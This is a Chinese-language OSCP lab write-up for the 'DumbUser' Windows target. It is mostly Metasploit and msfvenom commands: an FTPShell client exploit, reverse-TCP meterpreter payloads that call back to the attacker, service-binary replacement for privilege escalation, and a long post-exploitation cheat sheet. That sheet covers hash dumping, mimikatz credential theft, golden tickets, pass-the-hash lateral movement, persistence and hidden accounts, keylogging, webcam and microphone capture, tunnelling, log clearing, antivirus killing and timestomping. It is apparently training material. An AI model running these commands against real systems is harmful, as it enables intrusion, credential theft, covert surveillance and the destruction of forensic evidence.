OSCP-006-DumbUser

靶场配置

用vm打不开靶场,只能一个vmware开kali,靶场放OVB了,网络设置成桥接

先登录DumbUser用户DumbUser:DumbUser,更改密码后,x进入系统先查看IP地址

靶机:192.168.3.11

nmcli操作错误恢复原配置

删除当前连接,重新创建

# 1. 记录当前网卡名
nmcli device status
# 2. 删除当前连接配置(不会断网,只是删除配置)
sudo nmcli connection delete "Wired connection 1"
# 3. 重新扫描并创建默认连接
sudo nmcli device connect eth0 # 把 eth0 换成你的实际网卡名

kali中用msf配置ftp服务器

msfconsole
use windows/ftp/ftpshell_cli_bof
set LHOST 192.168.3.12
set SRVHOST 192.168.3.12
set payload windows/meterpreter/reverse_tcp
run

靶机链接ftp服务器

image-20260718160124344

好像是FTPShell Client不对的问题,解决不了,但主要是学习思路,自己再搭一个另外的测试,就用

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f exe -o meter.exe

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set 场景 LHOST 0.0.0.0
set LPORT 4444
run

Windows提权

把accesschk64.exe传上去,检查系统权限配置

shell
accesschk64.exe /accepteula -uwcqv 
参数 含义
/accepteula 自动接受许可协议(非交互式运行)
-u 忽略用户账户的继承权限,只显示显式权限
-w 只显示写权限(Write access)
-c 检查服务(Services)的权限
-q 静默模式,只显示有问题的项目
-v 详细输出
accesschk64.exe -uwqs Users c:\*.*
参数 含义
-u 忽略继承权限
-w 只显示写权限
-q 静默模式
-s 递归检查子目录
Users 指定检查 Users 用户组 的权限
c:\*.* 检查 C 盘所有文件

递归查找 C 盘中 Users 组有写权限 的文件/目录,这个命令扫描整个 C 盘,非常慢,通常会输出大量结果,可以缩小范围,只扫描重要目录

accesschk64.exe -uwqs Users "C:\Program Files\*"
accesschk64.exe -uwqs Users "C:\Program Files (x86)\*"

找到有用的服务

sc qc SecurityService

image-20260719144444703

根据目录去查看文件的ACL

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

image-20260719144702484

tasklist /svc

查找对应的服务,然后生成替换exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=(IP) LPORT=4445 -f exe -o SecurityService.exe

传到对应目录进行替换

upload SecurityService.exe "C:\Users\DumbUser"
# 进入 shell 替换
shell
move "C:\Program Files (x86)\PCProtect\SecurityService.exe" "C:\Program Files (x86)\PCProtect\SecurityService.exe.bak"
move "C:\Users\DumbUser\SecurityService.exe" "C:\Program Files (x86)\PCProtect\SecurityService.exe"
exit

重启触发服务,再在kali开个监听

# 触发重启(或手动重启服务)
execute -f cmd.exe -a "/c shutdown /r /t 0 /f"

image-20260719145222483

获取到权限后

# 进程迁移(稳定会话)
run post/windows/manage/migrate

后渗透阶段

信息收集

# 基础系统信息
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

# 详细枚举
meterpreter > run post/windows/gather/enum_applications # 已安装软件
meterpreter > run post/windows/gather/enum_shares # 共享目录
meterpreter > run post/windows/gather/enum_snmp # SNMP 信息
meterpreter > run post/windows/gather/checkvm # 检测虚拟机
meterpreter > run post/windows/gather/forensics/enum_drives # 磁盘信息

# 网络信息
meterpreter > ipconfig
meterpreter > route
meterpreter > arp

# 凭证收集
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/windows/gather/hashdump # 密码哈希
meterpreter > run post/windows/gather/smart_hashdump # 智能提取

权限提升

# 自动提权
meterpreter > getsystem

# 手动提权模块
meterpreter > run post/windows/escalate/bypassuac # UAC 绕过
meterpreter > run post/windows/escalate/bypassuac_injection
meterpreter > run post/windows/escalate/bypassuac_eventvwr

# 服务提权,本词使用的就是服务提权
meterpreter > run post/windows/escalate/service_permissions # 自动查找可写服务

# 内核漏洞提权
meterpreter > run post/windows/escalate/ms16_032 # Secondary Logon Handle
meterpreter > run post/windows/escalate/ms14_058 # TrackPopupMenu

横向移动

# 使用获取的哈希进行 Pass-the-Hash
meterpreter > run post/windows/manage/payload_inject # 注入 payload

# PSExec 横向移动
msf6 > use exploit/windows/smb/psexec
msf6 > set SMBUser Administrator
msf6 > set SMBPass <hash>
msf6 > set RHOSTS 192.168.1.20
msf6 > run

# WMI 横向移动
msf6 > use exploit/windows/local/wmi
msf6 > set SESSION 1
msf6 > set RHOSTS 192.168.1.20
msf6 > run

# 使用 mimikatz 获取明文密码后横向
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > golden_ticket_create

持久化

# 注册表持久化
meterpreter > run post/windows/manage/persistence_exe # EXE 持久化
meterpreter > run post/windows/manage/registry_startup # 注册表启动项

# 服务持久化
meterpreter > run post/windows/manage/install_service

# WMI 持久化
meterpreter > run post/windows/manage/wmi_persistence

# 计划任务
meterpreter > run post/windows/manage/scheduleme

# 后门账户
meterpreter > run post/windows/manage/enable_rdp # 开启 RDP
meterpreter > run post/windows/manage/add_user # 添加隐藏用户

数据窃取

# 文件操作
meterpreter > ls
meterpreter > cd
meterpreter > upload /root/file.txt C:\\Windows\\Temp\\file.txt
meterpreter > download C:\\Users\\Administrator\\Desktop\\secret.doc /root/

# 搜索敏感文件
meterpreter > run post/windows/gather/enum_files # 搜索特定文件
meterpreter > search -f *.docx -d C:\\Users # 搜索 docx
meterpreter > search -f *password* -d C:\\ # 搜索含 password 的文件

# 键盘记录
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

# 屏幕截图
meterpreter > screenshot

# 摄像头/麦克风
meterpreter > webcam_list
meterpreter > webcam_snap
meterpreter > record_mic

隧道

# 端口转发
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.20 # 本地转发
meterpreter > portfwd list

# SOCKS 代理
meterpreter > run post/multi/manage/autoroute # 添加路由
meterpreter > background
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > run

# 然后配合 proxychains
proxychains nmap -sT 10.0.0.0/24

清理痕迹

# 清除事件日志
meterpreter > run post/windows/manage/clear_eventlog

# 删除自身
meterpreter > run post/windows/manage/migrate # 先迁移
meterpreter > run post/windows/manage/killav # 关闭杀软(慎用)

# 清理 MSF 痕迹
meterpreter > timestomp C:\\Windows\\Temp\\evil.exe -z # 修改时间戳